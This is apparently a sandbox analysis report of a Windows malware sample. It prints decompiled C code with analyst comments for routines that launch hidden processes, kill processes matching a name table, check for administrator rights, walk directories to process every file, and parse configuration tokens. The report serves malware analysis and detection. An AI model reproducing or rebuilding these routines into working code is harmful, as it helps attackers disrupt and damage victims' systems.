                                        								_t29 =  !=  ? 1 : _t28;
                                        								_v8 =  !=  ? 1 : _t28;
                                        							} else {
                                        								_t26 =  *_t35 & 0x0000ffff;
                                        								if(_t26 != 0) {
                                        									_t44 = _t35 - _t23;
                                        									do {
                                        										_t20 = _t23;
                                        										if(_t26 == 0) {
                                        											L16:
                                        											if( *_t20 == 0) {
                                        												goto L19;
                                        											} else {
                                        												goto L17;
                                        											}
                                        										} else {
                                        											while(1) {
                                        												_t27 =  *_t20 & 0x0000ffff;
                                        												if(_t27 == 0) {
                                        													break;
                                        												}
                                        												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
                                        												if(_t31 != 0) {
                                        													goto L16;
                                        												} else {
                                        													_t20 = _t20 + 2;
                                        													if( *(_t44 + _t20) != _t31) {
                                        														continue;
                                        													} else {
                                        														goto L16;
                                        													}
                                        												}
                                        												goto L21;
                                        											}
                                        											L19:
                                        											_t28 = 0;
                                        											goto L20;
                                        										}
                                        										goto L21;
                                        										L17:
                                        										_t26 = _t35[1] & 0x0000ffff;
                                        										_t35 =  &(_t35[1]);
                                        										_t44 = _t44 + 2;
                                        									} while (_t26 != 0);
                                        								}
                                        							}
                                        							L21:
                                        							VirtualFree(_t23, 0, 0x8000);
                                        							return _v8;
                                        						} else {
                                        							goto L7;
                                        						}
                                        					}
                                        				} else {
                                        					return 1;
                                        				}
                                        			}

                                        0x0f9d6853
                                        0x0f9d685c
                                        0x0f9d685e
                                        0x0f9d6872
                                        0x0f9d6877
                                        0x0f9d687c
                                        0x0f9d6890
                                        0x0f9d689a
                                        0x0f9d6880
                                        0x0f9d6880
                                        0x0f9d6886
                                        0x0f9d6889
                                        0x0f9d688a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d688a
                                        0x0f9d688e
                                        0x0f9d68b7
                                        0x0f9d68bf
                                        0x0f9d68c5
                                        0x0f9d68cb
                                        0x0f9d68d0
                                        0x0f9d68d6
                                        0x0f9d6922
                                        0x0f9d6929
                                        0x0f9d692c
                                        0x0f9d68d8
                                        0x0f9d68d8
                                        0x0f9d68de
                                        0x0f9d68e2
                                        0x0f9d68e4
                                        0x0f9d68e4
                                        0x0f9d68e9
                                        0x0f9d6909
                                        0x0f9d690d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d68eb
                                        0x0f9d68f0
                                        0x0f9d68f0
                                        0x0f9d68f6
                                        0x00000000
                                        0x00000000
                                        0x0f9d68fc
                                        0x0f9d68fe
                                        0x00000000
                                        0x0f9d6900
                                        0x0f9d6900
                                        0x0f9d6907
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d6907
                                        0x00000000
                                        0x0f9d68fe
                                        0x0f9d6920
                                        0x0f9d6920
                                        0x00000000
                                        0x0f9d6920
                                        0x00000000
                                        0x0f9d690f
                                        0x0f9d690f
                                        0x0f9d6913
                                        0x0f9d6916
                                        0x0f9d6919
                                        0x0f9d691e
                                        0x0f9d68de
                                        0x0f9d692f
                                        0x0f9d6937
                                        0x0f9d6946
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d688e
                                        0x0f9d6860
                                        0x0f9d6869
                                        0x0f9d6869

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F9D698A), ref: 0F9D6872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: %s
                                        • API String ID: 1659193697-4273690596
                                        • Opcode ID: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction ID: 220044b21a863b118e7884348ec18289af32a7bd8d70384166d6060dd4a1cb93
                                        • Opcode Fuzzy Hash: 8e67ce7481fd142d2bff3df60002288fecb908c5082f09d326806e134051fad0
                                        • Instruction Fuzzy Hash: CA212772A0122897E7385F2CAC003F673ECEF84325FA5C126FE459B1C2E7B569908290
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			// Analyst note: spawns the command line passed in __ecx as a hidden child process
                                        			// (dwFlags 0x101 = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW, wShowWindow 0 = SW_HIDE)
                                        			// with stdin/stdout/stderr inherited from two global handles, then closes the returned handles.
                                        			E0F9D4C40(WCHAR* __ecx) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				struct _STARTUPINFOW _v92;
                                        				intOrPtr _t15;
                                        				intOrPtr _t16;
                                        				WCHAR* _t25;
                                        
                                        				asm("xorps xmm0, xmm0");
                                        				_t25 = __ecx;
                                        				asm("movdqu [ebp-0x10], xmm0");
                                        				E0F9D9010( &_v92, 0, 0x44);
                                        				_t15 =  *0xf9e2a6c; // 0x49c
                                        				_v92.hStdError = _t15;
                                        				_v92.hStdOutput = _t15;
                                        				_t16 =  *0xf9e2a68; // 0x4a4
                                        				_v92.dwFlags = _v92.dwFlags | 0x00000101;
                                        				_v92.hStdInput = _t16;
                                        				_v92.wShowWindow = 0;
                                        				_v92.cb = 0x44;
                                        				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
                                        					CloseHandle(_v20);
                                        					return CloseHandle(_v20.hThread);
                                        				} else {
                                        					return GetLastError();
                                        				}
                                        			}

                                        Statement addresses: 0x0f9d4c4c, 0x0f9d4c52, 0x0f9d4c54, 0x0f9d4c59, 0x0f9d4c5e, 0x0f9d4c66, 0x0f9d4c69, 0x0f9d4c6c, 0x0f9d4c71, 0x0f9d4c78, 0x0f9d4c7d, 0x0f9d4c88, 0x0f9d4ca7, 0x0f9d4cbd, 0x0f9d4cc8, 0x0f9d4ca9, 0x0f9d4cb3, 0x0f9d4cb3

                                        APIs
                                        • _memset.LIBCMT ref: 0F9D4C59
                                        • CreateProcessW.KERNEL32 ref: 0F9D4C9F
                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0F9D4CA9
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CBD
                                        • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F9D4CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateErrorLastProcess_memset
                                        • String ID: D
                                        • API String ID: 1393943095-2746444292
                                        • Opcode ID: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction ID: d5c176166556a1cec192e4fde72d849ed3edbaa42d9fd8a2de9c06f5343fc7d6
                                        • Opcode Fuzzy Hash: fb0a166359b1416d4cc49898cf0cff4c8ea6a83f5a795235605d8265b9e872d3
                                        • Instruction Fuzzy Hash: 2F016171E44318ABEB20DBA4DC05BDE7BB8EF04715F204126F608FA180E7B525648B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			// Analyst note: process-kill loop. Walks a Toolhelp snapshot (_a12) with Process32NextW and compares
                                        			// each entry's szExeFile (offset 0x24 of PROCESSENTRY32W) case-insensitively against a table of
                                        			// 0x27 names at [_t28 + 0x14]; a match is opened with PROCESS_TERMINATE (0x1) and terminated.
                                        			// The duplicated L2 block is a decompiler artifact of the goto into the do/while loop.
                                        			E0F9D48A8(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                        				int _t8;
                                        				int _t9;
                                        				void* _t15;
                                        				WCHAR* _t17;
                                        				void* _t18;
                                        				signed int _t23;
                                        				void* _t24;
                                        				void* _t28;
                                        
                                        				_t17 = __ecx;
                                        				_t15 = __ebx;
                                        				while(1) {
                                        					L2:
                                        					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                        					if(_t8 == 0) {
                                        						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                        						if(_t18 != 0) {
                                        							TerminateProcess(_t18, 0);
                                        							CloseHandle(_t18);
                                        						}
                                        					}
                                        					_t23 = _t23 + 1;
                                        					_t5 = _t15 + 0x24; // 0x24
                                        					_t17 = _t5;
                                        					if(_t23 < 0x27) {
                                        						continue;
                                        					}
                                        					L7:
                                        					_t24 = _a12;
                                        					_t9 = Process32NextW(_t24, _t15);
                                        					_t7 = _t15 + 0x24; // 0x24
                                        					_t17 = _t7;
                                        					if(_t9 != 0) {
                                        						_t23 = 0;
                                        						do {
                                        							goto L2;
                                        						} while (_t23 < 0x27);
                                        						goto L7;
                                        					}
                                        					if(_t15 != 0) {
                                        						VirtualFree(_t15, 0, 0x8000);
                                        					}
                                        					return CloseHandle(_t24);
                                        					L2:
                                        					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                        					if(_t8 == 0) {
                                        						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                        						if(_t18 != 0) {
                                        							TerminateProcess(_t18, 0);
                                        							CloseHandle(_t18);
                                        						}
                                        					}
                                        					_t23 = _t23 + 1;
                                        					_t5 = _t15 + 0x24; // 0x24
                                        					_t17 = _t5;
                                        				}
                                        			}

                                        Statement addresses: 0x0f9d48a8, 0x0f9d48a8, 0x0f9d48b0, 0x0f9d48b0, 0x0f9d48b5, 0x0f9d48bd, 0x0f9d48cb, 0x0f9d48cf, 0x0f9d48d4, 0x0f9d48e1, 0x0f9d48e1, 0x0f9d48cf, 0x0f9d48eb, 0x0f9d48ec, 0x0f9d48ec, 0x0f9d48f2, 0x00000000, 0x00000000, 0x0f9d48f4, 0x0f9d48f4, 0x0f9d48fa, 0x0f9d4900, 0x0f9d4900, 0x0f9d4905, 0x0f9d48a4, 0x0f9d48b0, 0x00000000, 0x00000000, 0x00000000, 0x0f9d48b0, 0x0f9d4909, 0x0f9d4913, 0x0f9d4913, 0x0f9d4922, 0x0f9d48b0, 0x0f9d48b5, 0x0f9d48bd, 0x0f9d48cb, 0x0f9d48cf, 0x0f9d48d4, 0x0f9d48e1, 0x0f9d48e1, 0x0f9d48cf, 0x0f9d48eb, 0x0f9d48ec, 0x0f9d48ec, 0x0f9d48ef

                                        APIs
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcess$FreeNextOpenProcess32TerminateVirtuallstrcmpi
                                        • String ID:
                                        • API String ID: 999196985-0
                                        • Opcode ID: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction ID: 0c13e90c3f37b1b6ccbedb493f378c29d98aa27ca2bf31660fff7f38523b81a4
                                        • Opcode Fuzzy Hash: 29c2c596a43e13983be63ca31ab453c9e7a51d9deeea4ad92d9bd36f1549700a
                                        • Instruction Fuzzy Hash: B3012D36205101AFE7259F65EC48BAA736CEF85762F304034FE0997083DB75E8648FA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 63%
                                        			// Analyst note: administrator check. Builds the well-known SID S-1-5-32-544 (authority byte 5 =
                                        			// SECURITY_NT_AUTHORITY via _v16 = 0x500, sub-authorities 0x20 = BUILTIN and 0x220 = Administrators)
                                        			// and resolves CheckTokenMembership at run time to test whether the current token holds it.
                                        			E0F9D3AA0() {
                                        				signed int _v8;
                                        				void* _v12;
                                        				short _v16;
                                        				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                        				int _t13;
                                        				_Unknown_base(*)()* _t15;
                                        				signed int _t16;
                                        
                                        				_v20.Value = 0;
                                        				_v16 = 0x500;
                                        				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                        				if(_t13 != 0) {
                                        					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
                                        					_t16 =  *_t15(0, _v12,  &_v8);
                                        					asm("sbb eax, eax");
                                        					_v8 = _v8 &  ~_t16;
                                        					FreeSid(_v12);
                                        					return _v8;
                                        				} else {
                                        					return _t13;
                                        				}
                                        			}

                                        Statement addresses: 0x0f9d3aa9, 0x0f9d3ac9, 0x0f9d3ad0, 0x0f9d3ad8, 0x0f9d3aef, 0x0f9d3afe, 0x0f9d3b05, 0x0f9d3b07, 0x0f9d3b0a, 0x0f9d3b16, 0x0f9d3add, 0x0f9d3add, 0x0f9d3add

                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0F9D3AE3
                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0F9D3AEF
                                        • FreeSid.ADVAPI32(?), ref: 0F9D3B0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressAllocateFreeHandleInitializeModuleProc
                                        • String ID: CheckTokenMembership$advapi32.dll
                                        • API String ID: 3309497720-1888249752
                                        • Opcode ID: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction ID: fd64464d9024e11344a8e38af1d1083c35d9bf8365ec0ac1056304d397eabc77
                                        • Opcode Fuzzy Hash: 18914138cd8a4ae0d84f515ac4a858540ed74b990cd854cf46b19445d37c76dd
                                        • Instruction Fuzzy Hash: 56F04F30A4530DBBEF109BE4DC0AFADB778EB04716F204584F905E6182E7B866648B55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			// Analyst note: directory enumeration loop driven by FindNextFileW on a WIN32_FIND_DATAW at
                                        			// [_t51 - 0x264]. Entries named "." and ".." are skipped; the name is appended to the path buffer
                                        			// _t46, subdirectories (FILE_ATTRIBUTE_DIRECTORY, 0x10) recurse through E0F9D6C90, and regular
                                        			// files are passed to E0F9D6950 with a running 64-bit total and counter updated afterwards.
                                        			E0F9D6D09() {
                                        				intOrPtr* _t34;
                                        				intOrPtr* _t38;
                                        				void* _t40;
                                        				WCHAR* _t46;
                                        				void* _t51;
                                        
                                        				do {
                                        					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
                                        						lstrcatW(_t46, _t51 - 0x238);
                                        						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
                                        							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
                                        							 *_t38 =  *_t38 + E0F9D6950(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
                                        							asm("adc [ebx+0x4], edx");
                                        							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
                                        							if(__eflags <= 0) {
                                        								if(__eflags < 0) {
                                        									L8:
                                        									_t34 =  *((intOrPtr*)(_t51 + 0xc));
                                        									 *_t34 =  *_t34 + 1;
                                        									__eflags =  *_t34;
                                        								} else {
                                        									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
                                        									if(__eflags < 0) {
                                        										goto L8;
                                        									}
                                        								}
                                        							}
                                        						} else {
                                        							E0F9D6C90(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
                                        						}
                                        						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
                                        					}
                                        				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
                                        				FindClose( *(_t51 - 8));
                                        				return 0;
                                        			}

                                        Statement addresses: 0x0f9d6d10, 0x0f9d6d24, 0x0f9d6d48, 0x0f9d6d51, 0x0f9d6d82, 0x0f9d6d8d, 0x0f9d6d8f, 0x0f9d6d92, 0x0f9d6d95, 0x0f9d6d97, 0x0f9d6da0, 0x0f9d6da0, 0x0f9d6da3, 0x0f9d6da3, 0x0f9d6d99, 0x0f9d6d9c, 0x0f9d6d9e, 0x00000000, 0x00000000, 0x0f9d6d9e, 0x0f9d6d97, 0x0f9d6d53, 0x0f9d6d67, 0x0f9d6d6c, 0x0f9d6db0, 0x0f9d6db0, 0x0f9d6dc3, 0x0f9d6dce, 0x0f9d6ddc

                                        APIs
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6D1C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6D48
                                        • lstrcatW.KERNEL32(00000000,0F9DFEFC), ref: 0F9D6D59
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F9D6DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0F9D6DCE
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 2032009209-0
                                        • Opcode ID: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction ID: c2b7066f0b0fcd1e62520437090976c7bdf39c3eadaeb314cad133264c0ec824
                                        • Opcode Fuzzy Hash: 101370233d85c7fbbd36b4bdc30c3d7d908449c2eedbbae6644d54c7daa7327c
                                        • Instruction Fuzzy Hash: 88019231A04209AADF11AF64EC48BEE7BBCEF85301F2080A6F905D5092DB359B65DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			// Analyst note: parses one "name=value}" token from the ANSI string _a4. It scans to '=' (0x3d),
                                        			// temporarily overwrites the closing '}' (0x7d) with NUL, copies the value into a fresh process-heap
                                        			// buffer stored at offset 4 (_a8 == 1) or offset 8 (_a8 == 2) of the object in __ecx, then restores
                                        			// the '}'. Returns 1 on success and 0 when the token has no value before the closing brace.
                                        			E0F9D3200(void* __ecx, CHAR* _a4, intOrPtr _a8) {
                                        				char _t5;
                                        				char _t6;
                                        				intOrPtr _t8;
                                        				int _t10;
                                        				CHAR* _t13;
                                        				int _t15;
                                        				void* _t18;
                                        				CHAR* _t21;
                                        				CHAR* _t23;
                                        
                                        				_t23 = _a4;
                                        				_t18 = __ecx;
                                        				_t5 =  *_t23;
                                        				if(_t5 == 0) {
                                        					L4:
                                        					_t6 =  *_t23;
                                        					if(_t6 == 0x7d) {
                                        						goto L10;
                                        					} else {
                                        						_t21 = _t23;
                                        						if(_t6 != 0) {
                                        							while( *_t21 != 0x7d) {
                                        								_t21 =  &(_t21[1]);
                                        								if( *_t21 != 0) {
                                        									continue;
                                        								} else {
                                        								}
                                        								goto L12;
                                        							}
                                        							 *_t21 = 0;
                                        						}
                                        						L12:
                                        						_t8 = _a8;
                                        						if(_t8 != 1) {
                                        							if(_t8 == 2) {
                                        								_t10 = lstrlenA(_t23);
                                        								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
                                        								 *(_t18 + 8) = _t13;
                                        								goto L16;
                                        							}
                                        						} else {
                                        							_t15 = lstrlenA(_t23);
                                        							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
                                        							 *(_t18 + 4) = _t13;
                                        							L16:
                                        							if(_t13 != 0) {
                                        								lstrcpyA(_t13, _t23);
                                        							}
                                        						}
                                        						 *_t21 = 0x7d;
                                        						return 1;
                                        					}
                                        				} else {
                                        					while(_t5 != 0x7d) {
                                        						_t23 =  &(_t23[1]);
                                        						if(_t5 == 0x3d) {
                                        							goto L4;
                                        						} else {
                                        							_t5 =  *_t23;
                                        							if(_t5 != 0) {
                                        								continue;
                                        							} else {
                                        								goto L4;
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        					L10:
                                        					return 0;
                                        				}
                                        				L19:
                                        			}

                                        Statement addresses: 0x0f9d3205, 0x0f9d3208, 0x0f9d320a, 0x0f9d320e, 0x0f9d321f, 0x0f9d321f, 0x0f9d3223, 0x00000000, 0x0f9d3225, 0x0f9d3226, 0x0f9d322a, 0x0f9d3230, 0x0f9d3235, 0x0f9d3239, 0x00000000, 0x00000000, 0x0f9d323b, 0x00000000, 0x0f9d3239, 0x0f9d3245, 0x0f9d3245, 0x0f9d3248, 0x0f9d3248, 0x0f9d324e, 0x0f9d3270, 0x0f9d3273, 0x0f9d3284, 0x0f9d328a, 0x00000000, 0x0f9d328a, 0x0f9d3250, 0x0f9d3251, 0x0f9d3262, 0x0f9d3268, 0x0f9d328d, 0x0f9d328f, 0x0f9d3293, 0x0f9d3293, 0x0f9d328f, 0x0f9d3299, 0x0f9d32a5, 0x0f9d32a5, 0x0f9d3210, 0x0f9d3210, 0x0f9d3214, 0x0f9d3217, 0x00000000, 0x0f9d3219, 0x0f9d3219, 0x0f9d321d, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0f9d321d, 0x00000000, 0x0f9d3217, 0x0f9d323e, 0x0f9d3242, 0x0f9d3242, 0x00000000

                                        APIs
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3251
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D325B
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3262
                                        • lstrlenA.KERNEL32(0F9D52F0,00000000,?,0F9D52F1,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3273
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D327D
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3284
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F0,?,0F9D34BF,0F9D52F1,00000001,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3293
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcesslstrlen$lstrcpy
                                        • String ID:
                                        • API String ID: 511007297-0
                                        • Opcode ID: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction ID: 9257a7390a5bef036132b5f92ebc87f15ae39da7b187e8b39800f2465428626d
                                        • Opcode Fuzzy Hash: 207fc6d70b0720cc3de088976f2a1f5535eec1b52208e9fd038fb4db2c3f1e61
                                        • Instruction Fuzzy Hash: 9A11B9318091556EEB310F689848FA67B6CEF12362F74C505FAC5CB283C73994A68772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D33E0(int* __ecx, void* __eflags, CHAR* _a4) {
                                        				int* _v8;
                                        				void* _t8;
                                        				char _t10;
                                        				void* _t14;
                                        				void* _t15;
                                        				char _t18;
                                        				char _t19;
                                        				int _t20;
                                        				CHAR* _t23;
                                        				CHAR* _t26;
                                        				CHAR* _t35;
                                        				CHAR* _t40;
                                        
                                        				_push(__ecx);
                                        				_t26 = _a4;
                                        				_t37 = __ecx;
                                        				_v8 = __ecx;
                                        				__ecx[3] = _t26;
                                        				_t8 = E0F9D32B0(__ecx);
                                        				if(_t8 == 0 || _t8 == 0xffffffff) {
                                        					ExitProcess(0);
                                        				}
                                        				if(E0F9D3320(__ecx) == 0) {
                                        					 *__ecx = 0;
                                        					_t10 =  *_t26;
                                        					if(_t10 == 0) {
                                        						goto L4;
                                        					} else {
                                        						do {
                                        							if(_t10 == 0x7b) {
                                        								_t26 =  &(_t26[1]);
                                        								_t14 = E0F9D3190(_t26);
                                        								if(_t14 != 0) {
                                        									_t15 = _t14 - 1;
                                        									if(_t15 == 0) {
                                        										E0F9D3200(_t37, _t26, 1);
                                        									} else {
                                        										if(_t15 == 1) {
                                        											_t18 =  *_t26;
                                        											_t35 = _t26;
                                        											if(_t18 == 0) {
                                        												L15:
                                        												_t19 =  *_t35;
                                        												if(_t19 != 0x7d) {
                                        													_t40 = _t35;
                                        													if(_t19 != 0) {
                                        														while( *_t40 != 0x7d) {
                                        															_t40 =  &(_t40[1]);
                                        															if( *_t40 != 0) {
                                        																continue;
                                        															} else {
                                        															}
                                        															goto L21;
                                        														}
                                        														 *_t40 = 0;
                                        													}
                                        													L21:
                                        													_t20 = lstrlenA(_t35);
                                        													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
                                        													 *(_v8 + 8) = _t23;
                                        													if(_t23 != 0) {
                                        														lstrcpyA(_t23, _t35);
                                        													}
                                        													 *_t40 = 0x7d;
                                        													_t37 = _v8;
                                        												}
                                        											} else {
                                        												while(_t18 != 0x7d) {
